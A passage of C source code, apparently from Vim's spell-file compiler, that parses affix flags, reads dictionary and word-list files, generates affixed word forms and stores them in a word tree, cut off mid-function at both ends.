affitem2flag(
int flagtype,
char_u *item,
char_u *fname,
int lnum)
{
unsigned res;
char_u *p = item;
res = get_affitem(flagtype, &p);
if (res == 0)
{
if (flagtype == AFT_NUM)
smsg((char_u *)_("Flag is not a number in %s line %d: %s"),
fname, lnum, item);
else
smsg((char_u *)_("Illegal flag in %s line %d: %s"),
fname, lnum, item);
}
if (*p != NUL)
{
smsg((char_u *)_(e_affname), fname, lnum, item);
return 0;
}
return res;
}
/*
* Get one affix name from "*pp" and advance the pointer.
* Returns zero for an error; the pointer is still advanced in that case.
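* For "long" flags (and "caplong" flags starting with an upper-case letter)
* two characters are combined into one number: (first << 16) + second.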
*/
static unsigned
get_affitem(int flagtype, char_u **pp)
{
int res;
if (flagtype == AFT_NUM)
{
if (!VIM_ISDIGIT(**pp))
{
++*pp; /* always advance, avoid getting stuck */
return 0;
}
res = getdigits(pp);
}
else
{
#ifdef FEAT_MBYTE
res = mb_ptr2char_adv(pp);
#else
res = *(*pp)++;
#endif
if (flagtype == AFT_LONG || (flagtype == AFT_CAPLONG
&& res >= 'A' && res <= 'Z'))
{
if (**pp == NUL)
return 0;
#ifdef FEAT_MBYTE
res = mb_ptr2char_adv(pp) + (res << 16);
#else
res = *(*pp)++ + (res << 16);
#endif
}
}
return res;
}
/*
* Process the "compflags" string used in an affix file and append it to
* spin->si_compflags.
* The processing involves changing the affix names to ID numbers, so that
* they fit in one byte.
*/
static void
process_compflags(
spellinfo_T *spin,
afffile_T *aff,
char_u *compflags)
{
char_u *p;
char_u *prevp;
unsigned flag;
compitem_T *ci;
int id;
int len;
char_u *tp;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
/* Make room for the old and the new compflags, concatenated with a / in
* between. Processing it makes it shorter, but we don't know by how
* much, thus allocate the maximum. */
len = (int)STRLEN(compflags) + 1;
if (spin->si_compflags != NULL)
len += (int)STRLEN(spin->si_compflags) + 1;
p = getroom(spin, len, FALSE);
if (p == NULL)
return;
if (spin->si_compflags != NULL)
{
STRCPY(p, spin->si_compflags);
STRCAT(p, "/");
}
spin->si_compflags = p;
tp = p + STRLEN(p);
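/* "tp" is the write position; the renumbered flags are appended after any
 * previously stored compound flags. */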
for (p = compflags; *p != NUL; )
{
if (vim_strchr((char_u *)"/?*+[]", *p) != NULL)
/* Copy non-flag characters directly. */
*tp++ = *p++;
else
{
/* First get the flag number, also checks validity. */
prevp = p;
flag = get_affitem(aff->af_flagtype, &p);
if (flag != 0)
{
/* Find the flag in the hashtable. If it was used before, use
* the existing ID. Otherwise add a new entry. */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&aff->af_comp, key);
if (!HASHITEM_EMPTY(hi))
id = HI2CI(hi)->ci_newID;
else
{
ci = (compitem_T *)getroom(spin, sizeof(compitem_T), TRUE);
if (ci == NULL)
break;
STRCPY(ci->ci_key, key);
ci->ci_flag = flag;
/* Avoid using a flag ID that has a special meaning in a
* regexp (also inside []). */
do
{
check_renumber(spin);
id = spin->si_newcompID--;
} while (vim_strchr((char_u *)"/?*+[]\\-^", id) != NULL);
ci->ci_newID = id;
hash_add(&aff->af_comp, ci->ci_key);
}
*tp++ = id;
}
if (aff->af_flagtype == AFT_NUM && *p == ',')
++p;
}
}
*tp = NUL;
}
/*
* Check that the new IDs for postponed affixes and compounding don't overrun
* each other. We have almost 255 available, but start at 0-127 to avoid
* using two bytes for utf-8. When the 0-127 range is used up go to 128-255.
* When that is used up an error message is given.
*/
static void
check_renumber(spellinfo_T *spin)
{
if (spin->si_newprefID == spin->si_newcompID && spin->si_newcompID < 128)
{
spin->si_newprefID = 127;
spin->si_newcompID = 255;
}
}
/*
* Return TRUE if flag "flag" appears in affix list "afflist".
*/
static int
flag_in_afflist(int flagtype, char_u *afflist, unsigned flag)
{
char_u *p;
unsigned n;
switch (flagtype)
{
case AFT_CHAR:
return vim_strchr(afflist, flag) != NULL;
case AFT_CAPLONG:
case AFT_LONG:
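/* For "long" flags, and for "caplong" flags starting with an upper-case
 * letter, two characters are combined the same way as in get_affitem(). */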
for (p = afflist; *p != NUL; )
{
#ifdef FEAT_MBYTE
n = mb_ptr2char_adv(&p);
#else
n = *p++;
#endif
if ((flagtype == AFT_LONG || (n >= 'A' && n <= 'Z'))
&& *p != NUL)
#ifdef FEAT_MBYTE
n = mb_ptr2char_adv(&p) + (n << 16);
#else
n = *p++ + (n << 16);
#endif
if (n == flag)
return TRUE;
}
break;
case AFT_NUM:
for (p = afflist; *p != NUL; )
{
n = getdigits(&p);
if (n == flag)
return TRUE;
if (*p != NUL) /* skip over comma */
++p;
}
break;
}
return FALSE;
}
/*
* Give a warning when "spinval" and "affval" numbers are set and not the same.
*/
static void
aff_check_number(int spinval, int affval, char *name)
{
if (spinval != 0 && spinval != affval)
smsg((char_u *)_("%s value differs from what is used in another .aff file"), name);
}
/*
* Give a warning when "spinval" and "affval" strings are set and not the same.
*/
static void
aff_check_string(char_u *spinval, char_u *affval, char *name)
{
if (spinval != NULL && STRCMP(spinval, affval) != 0)
smsg((char_u *)_("%s value differs from what is used in another .aff file"), name);
}
/*
* Return TRUE if strings "s1" and "s2" are equal. Also consider both being
* NULL as equal.
*/
static int
str_equal(char_u *s1, char_u *s2)
{
if (s1 == NULL || s2 == NULL)
return s1 == s2;
return STRCMP(s1, s2) == 0;
}
/*
* Add a from-to item to "gap". Used for REP and SAL items.
* They are stored case-folded.
*/
static void
add_fromto(
spellinfo_T *spin,
garray_T *gap,
char_u *from,
char_u *to)
{
fromto_T *ftp;
char_u word[MAXWLEN];
if (ga_grow(gap, 1) == OK)
{
ftp = ((fromto_T *)gap->ga_data) + gap->ga_len;
(void)spell_casefold(from, (int)STRLEN(from), word, MAXWLEN);
ftp->ft_from = getroom_save(spin, word);
(void)spell_casefold(to, (int)STRLEN(to), word, MAXWLEN);
ftp->ft_to = getroom_save(spin, word);
++gap->ga_len;
}
}
/*
* Convert a boolean argument in a SAL line to TRUE or FALSE.
*/
static int
sal_to_bool(char_u *s)
{
return STRCMP(s, "1") == 0 || STRCMP(s, "true") == 0;
}
/*
* Free the structure filled by spell_read_aff().
*/
static void
spell_free_aff(afffile_T *aff)
{
hashtab_T *ht;
hashitem_T *hi;
int todo;
affheader_T *ah;
affentry_T *ae;
vim_free(aff->af_enc);
/* All this trouble to free the "ae_prog" items... */
for (ht = &aff->af_pref; ; ht = &aff->af_suff)
{
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
vim_regfree(ae->ae_prog);
}
}
if (ht == &aff->af_suff)
break;
}
hash_clear(&aff->af_pref);
hash_clear(&aff->af_suff);
hash_clear(&aff->af_comp);
}
/*
* Read dictionary file "fname".
* Returns OK or FAIL.
*/
static int
spell_read_dic(spellinfo_T *spin, char_u *fname, afffile_T *affile)
{
hashtab_T ht;
char_u line[MAXLINELEN];
char_u *p;
char_u *afflist;
char_u store_afflist[MAXWLEN];
int pfxlen;
int need_affix;
char_u *dw;
char_u *pc;
char_u *w;
int l;
hash_T hash;
hashitem_T *hi;
FILE *fd;
int lnum = 1;
int non_ascii = 0;
int retval = OK;
char_u message[MAXLINELEN + MAXWLEN];
int flags;
int duplicate = 0;
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
/* The hashtable is only used to detect duplicated words. */
hash_init(&ht);
vim_snprintf((char *)IObuff, IOSIZE,
_("Reading dictionary file %s ..."), fname);
spell_message(spin, IObuff);
/* start with a message for the first line */
spin->si_msg_count = 999999;
/* Read and ignore the first line: word count. */
(void)vim_fgets(line, MAXLINELEN, fd);
if (!vim_isdigit(*skipwhite(line)))
EMSG2(_("E760: No word count in %s"), fname);
/*
* Read all the lines in the file one by one.
* The words are converted to 'encoding' here, before being added to
* the hashtable.
*/
while (!vim_fgets(line, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
if (line[0] == '#' || line[0] == '/')
continue; /* comment line */
/* Remove CR, LF and white space from the end. White space halfway
* through the word is kept to allow e.g. "et al.". */
l = (int)STRLEN(line);
while (l > 0 && line[l - 1] <= ' ')
--l;
if (l == 0)
continue; /* empty line */
line[l] = NUL;
#ifdef FEAT_MBYTE
/* Convert from "SET" to 'encoding' when needed. */
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, line, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, line);
continue;
}
w = pc;
}
else
#endif
{
pc = NULL;
w = line;
}
/* Truncate the word at the "/", set "afflist" to what follows.
* Replace "\/" by "/" and "\\" by "\". */
afflist = NULL;
for (p = w; *p != NUL; mb_ptr_adv(p))
{
if (*p == '\\' && (p[1] == '\\' || p[1] == '/'))
STRMOVE(p, p + 1);
else if (*p == '/')
{
*p = NUL;
afflist = p + 1;
break;
}
}
/* Skip non-ASCII words when "spin->si_ascii" is TRUE. */
if (spin->si_ascii && has_non_ascii(w))
{
++non_ascii;
vim_free(pc);
continue;
}
/* This takes time, print a message every 10000 words. */
if (spin->si_verbose && spin->si_msg_count > 10000)
{
spin->si_msg_count = 0;
vim_snprintf((char *)message, sizeof(message),
_("line %6d, word %6d - %s"),
lnum, spin->si_foldwcount + spin->si_keepwcount, w);
msg_start();
msg_puts_long_attr(message, 0);
msg_clr_eos();
msg_didout = FALSE;
msg_col = 0;
out_flush();
}
/* Store the word in the hashtable to be able to find duplicates. */
dw = (char_u *)getroom_save(spin, w);
if (dw == NULL)
{
retval = FAIL;
vim_free(pc);
break;
}
hash = hash_hash(dw);
hi = hash_lookup(&ht, dw, hash);
if (!HASHITEM_EMPTY(hi))
{
if (p_verbose > 0)
smsg((char_u *)_("Duplicate word in %s line %d: %s"),
fname, lnum, dw);
else if (duplicate == 0)
smsg((char_u *)_("First duplicate word in %s line %d: %s"),
fname, lnum, dw);
++duplicate;
}
else
hash_add_item(&ht, hi, dw, hash);
flags = 0;
store_afflist[0] = NUL;
pfxlen = 0;
need_affix = FALSE;
if (afflist != NULL)
{
/* Extract flags from the affix list. */
flags |= get_affix_flags(affile, afflist);
if (affile->af_needaffix != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_needaffix))
need_affix = TRUE;
if (affile->af_pfxpostpone)
/* Need to store the list of prefix IDs with the word. */
pfxlen = get_pfxlist(affile, afflist, store_afflist);
if (spin->si_compflags != NULL)
/* Need to store the list of compound flags with the word.
* Concatenate them to the list of prefix IDs. */
get_compflags(affile, afflist, store_afflist + pfxlen);
}
/* Add the word to the word tree(s). */
if (store_word(spin, dw, flags, spin->si_region,
store_afflist, need_affix) == FAIL)
retval = FAIL;
if (afflist != NULL)
{
/* Find all matching suffixes and add the resulting words.
* Additionally do matching prefixes that combine. */
if (store_aff_word(spin, dw, afflist, affile,
&affile->af_suff, &affile->af_pref,
CONDIT_SUF, flags, store_afflist, pfxlen) == FAIL)
retval = FAIL;
/* Find all matching prefixes and add the resulting words. */
if (store_aff_word(spin, dw, afflist, affile,
&affile->af_pref, NULL,
CONDIT_SUF, flags, store_afflist, pfxlen) == FAIL)
retval = FAIL;
}
vim_free(pc);
}
if (duplicate > 0)
smsg((char_u *)_("%d duplicate word(s) in %s"), duplicate, fname);
if (spin->si_ascii && non_ascii > 0)
smsg((char_u *)_("Ignored %d word(s) with non-ASCII characters in %s"),
non_ascii, fname);
hash_clear(&ht);
fclose(fd);
return retval;
}
/*
* Check for affix flags in "afflist" that are turned into word flags.
* Return WF_ flags.
*/
static int
get_affix_flags(afffile_T *affile, char_u *afflist)
{
int flags = 0;
if (affile->af_keepcase != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_keepcase))
flags |= WF_KEEPCAP | WF_FIXCAP;
if (affile->af_rare != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_rare))
flags |= WF_RARE;
if (affile->af_bad != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_bad))
flags |= WF_BANNED;
if (affile->af_needcomp != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_needcomp))
flags |= WF_NEEDCOMP;
if (affile->af_comproot != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_comproot))
flags |= WF_COMPROOT;
if (affile->af_nosuggest != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_nosuggest))
flags |= WF_NOSUGGEST;
return flags;
}
/*
* Get the list of prefix IDs from the affix list "afflist".
* Used for PFXPOSTPONE.
* Put the resulting flags in "store_afflist[MAXWLEN]" with a terminating NUL
* and return the number of affixes.
*/
static int
get_pfxlist(
afffile_T *affile,
char_u *afflist,
char_u *store_afflist)
{
char_u *p;
char_u *prevp;
int cnt = 0;
int id;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
for (p = afflist; *p != NUL; )
{
prevp = p;
if (get_affitem(affile->af_flagtype, &p) != 0)
{
/* A flag is a postponed prefix flag if it appears in "af_pref"
* and its ID is not zero. */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&affile->af_pref, key);
if (!HASHITEM_EMPTY(hi))
{
id = HI2AH(hi)->ah_newID;
if (id != 0)
store_afflist[cnt++] = id;
}
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
store_afflist[cnt] = NUL;
return cnt;
}
/*
* Get the list of compound IDs from the affix list "afflist" that are used
* for compound words.
* Puts the flags in "store_afflist[]".
*/
static void
get_compflags(
afffile_T *affile,
char_u *afflist,
char_u *store_afflist)
{
char_u *p;
char_u *prevp;
int cnt = 0;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
for (p = afflist; *p != NUL; )
{
prevp = p;
if (get_affitem(affile->af_flagtype, &p) != 0)
{
/* A flag is a compound flag if it appears in "af_comp". */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&affile->af_comp, key);
if (!HASHITEM_EMPTY(hi))
store_afflist[cnt++] = HI2CI(hi)->ci_newID;
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
store_afflist[cnt] = NUL;
}
/*
* Apply affixes to a word and store the resulting words.
* "ht" is the hashtable with affentry_T that need to be applied, either
* prefixes or suffixes.
* "xht", when not NULL, is the prefix hashtable, to be used additionally on
* the resulting words for combining affixes.
*
* Returns FAIL when out of memory.
*/
static int
store_aff_word(
spellinfo_T *spin, /* spell info */
char_u *word, /* basic word start */
char_u *afflist, /* list of names of supported affixes */
afffile_T *affile,
hashtab_T *ht,
hashtab_T *xht,
int condit, /* CONDIT_SUF et al. */
int flags, /* flags for the word */
char_u *pfxlist, /* list of prefix IDs */
int pfxlen) /* nr of flags in "pfxlist" for prefixes, rest
* is compound flags */
{
int todo;
hashitem_T *hi;
affheader_T *ah;
affentry_T *ae;
char_u newword[MAXWLEN];
int retval = OK;
int i, j;
char_u *p;
int use_flags;
char_u *use_pfxlist;
int use_pfxlen;
int need_affix;
char_u store_afflist[MAXWLEN];
char_u pfx_pfxlist[MAXWLEN];
size_t wordlen = STRLEN(word);
int use_condit;
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0 && retval == OK; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
/* Check that the affix combines, if required, and that the word
* supports this affix. */
if (((condit & CONDIT_COMB) == 0 || ah->ah_combine)
&& flag_in_afflist(affile->af_flagtype, afflist,
ah->ah_flag))
{
/* Loop over all affix entries with this name. */
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
{
/* Check the condition. It's not logical to match case
* here, but it is required for compatibility with
* Myspell.
* Another requirement from Myspell is that the chop
* string is shorter than the word itself.
* For prefixes, when "PFXPOSTPONE" was used, only do
* prefixes with a chop string and/or flags.
* When a previously added affix had CIRCUMFIX this one
* must have it too, if it had not then this one must not
* have one either. */
if ((xht != NULL || !affile->af_pfxpostpone
|| ae->ae_chop != NULL
|| ae->ae_flags != NULL)
&& (ae->ae_chop == NULL
|| STRLEN(ae->ae_chop) < wordlen)
&& (ae->ae_prog == NULL
|| vim_regexec_prog(&ae->ae_prog, FALSE,
word, (colnr_T)0))
&& (((condit & CONDIT_CFIX) == 0)
== ((condit & CONDIT_AFF) == 0
|| ae->ae_flags == NULL
|| !flag_in_afflist(affile->af_flagtype,
ae->ae_flags, affile->af_circumfix))))
{
/* Match. Remove the chop and add the affix. */
if (xht == NULL)
{
/* prefix: chop/add at the start of the word */
if (ae->ae_add == NULL)
*newword = NUL;
else
vim_strncpy(newword, ae->ae_add, MAXWLEN - 1);
p = word;
if (ae->ae_chop != NULL)
{
/* Skip chop string. */
#ifdef FEAT_MBYTE
if (has_mbyte)
{
i = mb_charlen(ae->ae_chop);
for ( ; i > 0; --i)
mb_ptr_adv(p);
}
else
#endif
p += STRLEN(ae->ae_chop);
}
STRCAT(newword, p);
}
else
{
/* suffix: chop/add at the end of the word */
vim_strncpy(newword, word, MAXWLEN - 1);
if (ae->ae_chop != NULL)
{
/* Remove chop string. */
p = newword + STRLEN(newword);
i = (int)MB_CHARLEN(ae->ae_chop);
for ( ; i > 0; --i)
mb_ptr_back(newword, p);
*p = NUL;
}
if (ae->ae_add != NULL)
STRCAT(newword, ae->ae_add);
}
use_flags = flags;
use_pfxlist = pfxlist;
use_pfxlen = pfxlen;
need_affix = FALSE;
use_condit = condit | CONDIT_COMB | CONDIT_AFF;
if (ae->ae_flags != NULL)
{
/* Extract flags from the affix list. */
use_flags |= get_affix_flags(affile, ae->ae_flags);
if (affile->af_needaffix != 0 && flag_in_afflist(
affile->af_flagtype, ae->ae_flags,
affile->af_needaffix))
need_affix = TRUE;
/* When there is a CIRCUMFIX flag the other affix
* must also have it and we don't add the word
* with one affix. */
if (affile->af_circumfix != 0 && flag_in_afflist(
affile->af_flagtype, ae->ae_flags,
affile->af_circumfix))
{
use_condit |= CONDIT_CFIX;
if ((condit & CONDIT_CFIX) == 0)
need_affix = TRUE;
}
if (affile->af_pfxpostpone
|| spin->si_compflags != NULL)
{
if (affile->af_pfxpostpone)
/* Get prefix IDs from the affix list. */
use_pfxlen = get_pfxlist(affile,
ae->ae_flags, store_afflist);
else
use_pfxlen = 0;
use_pfxlist = store_afflist;
/* Combine the prefix IDs. Avoid adding the
* same ID twice. */
for (i = 0; i < pfxlen; ++i)
{
for (j = 0; j < use_pfxlen; ++j)
if (pfxlist[i] == use_pfxlist[j])
break;
if (j == use_pfxlen)
use_pfxlist[use_pfxlen++] = pfxlist[i];
}
if (spin->si_compflags != NULL)
/* Get compound IDs from the affix list. */
get_compflags(affile, ae->ae_flags,
use_pfxlist + use_pfxlen);
/* Combine the list of compound flags.
* Concatenate them to the prefix IDs list.
* Avoid adding the same ID twice. */
for (i = pfxlen; pfxlist[i] != NUL; ++i)
{
for (j = use_pfxlen;
use_pfxlist[j] != NUL; ++j)
if (pfxlist[i] == use_pfxlist[j])
break;
if (use_pfxlist[j] == NUL)
{
use_pfxlist[j++] = pfxlist[i];
use_pfxlist[j] = NUL;
}
}
}
}
/* Obey a "COMPOUNDFORBIDFLAG" of the affix: don't
* use the compound flags. */
if (use_pfxlist != NULL && ae->ae_compforbid)
{
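/* Copy only the prefix IDs; the compound IDs that follow them in the
 * list are dropped. */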
vim_strncpy(pfx_pfxlist, use_pfxlist, use_pfxlen);
use_pfxlist = pfx_pfxlist;
}
/* When there are postponed prefixes... */
if (spin->si_prefroot != NULL
&& spin->si_prefroot->wn_sibling != NULL)
{
/* ... add a flag to indicate an affix was used. */
use_flags |= WF_HAS_AFF;
/* ... don't use a prefix list if combining
* affixes is not allowed. But do use the
* compound flags after them. */
if (!ah->ah_combine && use_pfxlist != NULL)
use_pfxlist += use_pfxlen;
}
/* When compounding is supported and there is no
* "COMPOUNDPERMITFLAG" then forbid compounding on the
* side where the affix is applied. */
if (spin->si_compflags != NULL && !ae->ae_comppermit)
{
if (xht != NULL)
use_flags |= WF_NOCOMPAFT;
else
use_flags |= WF_NOCOMPBEF;
}
/* Store the modified word. */
if (store_word(spin, newword, use_flags,
spin->si_region, use_pfxlist,
need_affix) == FAIL)
retval = FAIL;
/* When a prefix or a first suffix was added and the affix
 * has flags, we may add a(nother) suffix. RECURSIVE! */
if ((condit & CONDIT_SUF) && ae->ae_flags != NULL)
if (store_aff_word(spin, newword, ae->ae_flags,
affile, &affile->af_suff, xht,
use_condit & (xht == NULL
? ~0 : ~CONDIT_SUF),
use_flags, use_pfxlist, pfxlen) == FAIL)
retval = FAIL;
/* When a suffix was added and combining is allowed, also
 * try adding a prefix. Do this both for the
 * word flags and for the affix flags. RECURSIVE! */
if (xht != NULL && ah->ah_combine)
{
if (store_aff_word(spin, newword,
afflist, affile,
xht, NULL, use_condit,
use_flags, use_pfxlist,
pfxlen) == FAIL
|| (ae->ae_flags != NULL
&& store_aff_word(spin, newword,
ae->ae_flags, affile,
xht, NULL, use_condit,
use_flags, use_pfxlist,
pfxlen) == FAIL))
retval = FAIL;
}
}
}
}
}
}
return retval;
}
/*
* Read a file with a list of words.
*/
static int
spell_read_wordfile(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
long lnum = 0;
char_u rline[MAXLINELEN];
char_u *line;
char_u *pc = NULL;
char_u *p;
int l;
int retval = OK;
int did_word = FALSE;
int non_ascii = 0;
int flags;
int regionmask;
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
vim_snprintf((char *)IObuff, IOSIZE, _("Reading word file %s ..."), fname);
spell_message(spin, IObuff);
/*
* Read all the lines in the file one by one.
*/
while (!vim_fgets(rline, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
/* Skip comment lines. */
if (*rline == '#')
continue;
/* Remove CR, LF and white space from the end. */
l = (int)STRLEN(rline);
while (l > 0 && rline[l - 1] <= ' ')
--l;
if (l == 0)
continue; /* empty or blank line */
rline[l] = NUL;
/* Convert from "/encoding={encoding}" to 'encoding' when needed. */
vim_free(pc);
#ifdef FEAT_MBYTE
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, rline, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, rline);
continue;
}
line = pc;
}
else
#endif
{
pc = NULL;
line = rline;
}
if (*line == '/')
{
++line;
if (STRNCMP(line, "encoding=", 9) == 0)
{
if (spin->si_conv.vc_type != CONV_NONE)
smsg((char_u *)_("Duplicate /encoding= line ignored in %s line %d: %s"),
fname, lnum, line - 1);
else if (did_word)
smsg((char_u *)_("/encoding= line after word ignored in %s line %d: %s"),
fname, lnum, line - 1);
else
{
#ifdef FEAT_MBYTE
char_u *enc;
/* Setup for conversion to 'encoding'. */
line += 9;
enc = enc_canonize(line);
if (enc != NULL && !spin->si_ascii
&& convert_setup(&spin->si_conv, enc,
p_enc) == FAIL)
smsg((char_u *)_("Conversion in %s not supported: from %s to %s"),
fname, line, p_enc);
vim_free(enc);
spin->si_conv.vc_fail = TRUE;
#else
smsg((char_u *)_("Conversion in %s not supported"), fname);
#endif
}
continue;
}
if (STRNCMP(line, "regions=", 8) == 0)
{
if (spin->si_region_count > 1)
smsg((char_u *)_("Duplicate /regions= line ignored in %s line %d: %s"),
fname, lnum, line);
else
{
line += 8;
if (STRLEN(line) > 16)
smsg((char_u *)_("Too many regions in %s line %d: %s"),
fname, lnum, line);
else
{
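/* Each region name is two characters, so the count is half the
 * string length (e.g. "usca" defines the regions "us" and "ca"). */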
spin->si_region_count = (int)STRLEN(line) / 2;
STRCPY(spin->si_region_name, line);
/* Adjust the mask for a word valid in all regions. */
spin->si_region = (1 << spin->si_region_count) - 1;
}
}
continue;
}
smsg((char_u *)_("/ line ignored in %s line %d: %s"),
fname, lnum, line - 1);
continue;
}
flags = 0;
regionmask = spin->si_region;
/* Check for flags and region after a slash. */
p = vim_strchr(line, '/');
if (p != NULL)
{
*p++ = NUL;
while (*p != NUL)
{
if (*p == '=') /* keep-case word */
flags |= WF_KEEPCAP | WF_FIXCAP;
else if (*p == '!') /* Bad, bad, wicked word. */
flags |= WF_BANNED;
else if (*p == '?') /* Rare word. */
flags |= WF_RARE;
else if (VIM_ISDIGIT(*p)) /* region number(s) */
{
if ((flags & WF_REGION) == 0) /* first one */
regionmask = 0;
flags |= WF_REGION;
l = *p - '0';
if (l > spin->si_region_count)
{
smsg((char_u *)_("Invalid region nr in %s line %d: %s"),
fname, lnum, p);
break;
}
regionmask |= 1 << (l - 1);
}
else
{
smsg((char_u *)_("Unrecognized flags in %s line %d: %s"),
fname, lnum, p);
break;
}
++p;
}
}
/* Skip non-ASCII words when "spin->si_ascii" is TRUE. */
if (spin->si_ascii && has_non_ascii(line))
{
++non_ascii;
continue;
}
/* Normal word: store it. */
if (store_word(spin, line, flags, regionmask, NULL, FALSE) == FAIL)
{
retval = FAIL;
break;
}
did_word = TRUE;
}
vim_free(pc);
fclose(fd);
if (spin->si_ascii && non_ascii > 0)
{
vim_snprintf((char *)IObuff, IOSIZE,
_("Ignored %d words with non-ASCII characters"), non_ascii);
spell_message(spin, IObuff);
}
return retval;
}
/*
* Get part of an sblock_T, "len" bytes long.
* This avoids calling free() for every little struct we use (and keeping
* track of them).
* The memory is cleared to all zeros.
* Returns NULL when out of memory.
*/
static void *
getroom(
spellinfo_T *spin,
size_t len, /* length needed */
int align) /* align for pointer */
{
char_u *p;
sblock_T *bl = spin->si_blocks;
if (align && bl != NULL)
/* Round size up for alignment. On some systems structures need to be
* aligned to the size of a pointer (e.g., SPARC). */
bl->sb_used = (bl->sb_used + sizeof(char *) - 1)
& ~(sizeof(char *) - 1);
if (bl == NULL || bl->sb_used + len > SBLOCKSIZE)
{
if (len >= SBLOCKSIZE)
bl = NULL;
else
/* Allocate a block of memory. It is not freed until much later. */
bl = (sblock_T *)alloc_clear(
(unsigned)(sizeof(sblock_T) + SBLOCKSIZE));
if (bl == NULL)
{
if (!spin->si_did_emsg)
{
EMSG(_("E845: Insufficient memory, word list will be incomplete"));
spin->si_did_emsg = TRUE;
}
return NULL;
}
bl->sb_next = spin->si_blocks;
spin->si_blocks = bl;
bl->sb_used = 0;
++spin->si_blocks_cnt;
}
p = bl->sb_data + bl->sb_used;
bl->sb_used += (int)len;
return p;
}
/*
* Make a copy of a string into memory allocated with getroom().
* Returns NULL when out of memory.
*/
static char_u *
getroom_save(spellinfo_T *spin, char_u *s)
{
char_u *sc;
sc = (char_u *)getroom(spin, STRLEN(s) + 1, FALSE);
if (sc != NULL)
STRCPY(sc, s);
return sc;
}
/*
* Free the list of allocated sblock_T.
*/
static void
free_blocks(sblock_T *bl)
{
sblock_T *next;
while (bl != NULL)
{
next = bl->sb_next;
vim_free(bl);
bl = next;
}
}
/*
* Allocate the root of a word tree.
* Returns NULL when out of memory.
*/
static wordnode_T *
wordtree_alloc(spellinfo_T *spin)
{
return (wordnode_T *)getroom(spin, sizeof(wordnode_T), TRUE);
}
/*
* Store a word in the tree(s).
* Always store it in the case-folded tree. For a keep-case word this is
* useful when the word can also be used with all caps (no WF_FIXCAP flag) and
* used to find suggestions.
* For a keep-case word also store it in the keep-case tree.
* When "pfxlist" is not NULL store the word for each postponed prefix ID and
* compound flag.
*/
static int
store_word(
spellinfo_T *spin,
char_u *word,
int flags, /* extra flags, WF_BANNED */
int region, /* supported region(s) */
char_u *pfxlist, /* list of prefix IDs or NULL */
int need_affix) /* only store word with affix ID */
{
int len = (int)STRLEN(word);
int ct = captype(word, word + len);
char_u foldword[MAXWLEN];
int res = OK;
char_u *p;
(void)spell_casefold(word, len, foldword, MAXWLEN);
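    /* Add the case-folded word once for every prefix/compound ID in
     * "pfxlist".  When "pfxlist" is NULL the loop below runs exactly once,
     * using affix ID zero. */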
for (p = pfxlist; res == OK; ++p)
{
if (!need_affix || (p != NULL && *p != NUL))
res = tree_add_word(spin, foldword, spin->si_foldroot, ct | flags,
region, p == NULL ? 0 : *p);
if (p == NULL || *p == NUL)
break;
}
++spin->si_foldwcount;
if (res == OK && (ct == WF_KEEPCAP || (flags & WF_KEEPCAP)))
{
for (p = pfxlist; res == OK; ++p)
{
if (!need_affix || (p != NULL && *p != NUL))
res = tree_add_word(spin, word, spin->si_keeproot, flags,
region, p == NULL ? 0 : *p);
if (p == NULL || *p == NUL)
break;
}
++spin->si_keepwcount;
}
return res;
}
/*
* Add word "word" to a word tree at "root".
* When "flags" < 0 we are adding to the prefix tree where "flags" is used for
* "rare" and "region" is the condition nr.
* Returns FAIL when out of memory.
*/
static int
tree_add_word(
spellinfo_T *spin,
char_u *word,
wordnode_T *root,
int flags,
int region,
int affixID)
{
wordnode_T *node = root;
wordnode_T *np;
wordnode_T *copyp, **copyprev;
wordnode_T **prev = NULL;
int i;
/* Add each byte of the word to the tree, including the NUL at the end. */
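    /* Example with the ASCII word "en": a sibling for 'e' is found or created
     * at the top level, a child sibling for 'n' below it, and finally a NUL
     * sibling that stores the flags, region mask and affix ID for this word. */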
for (i = 0; ; ++i)
{
/* When there is more than one reference to this node we need to make
* a copy, so that we can modify it. Copy the whole list of siblings
* (we don't optimize for a partly shared list of siblings). */
if (node != NULL && node->wn_refs > 1)
{
--node->wn_refs;
copyprev = prev;
for (copyp = node; copyp != NULL; copyp = copyp->wn_sibling)
{
/* Allocate a new node and copy the info. */
np = get_wordnode(spin);
if (np == NULL)
return FAIL;
np->wn_child = copyp->wn_child;
if (np->wn_child != NULL)
++np->wn_child->wn_refs; /* child gets extra ref */
np->wn_byte = copyp->wn_byte;
if (np->wn_byte == NUL)
{
np->wn_flags = copyp->wn_flags;
np->wn_region = copyp->wn_region;
np->wn_affixID = copyp->wn_affixID;
}
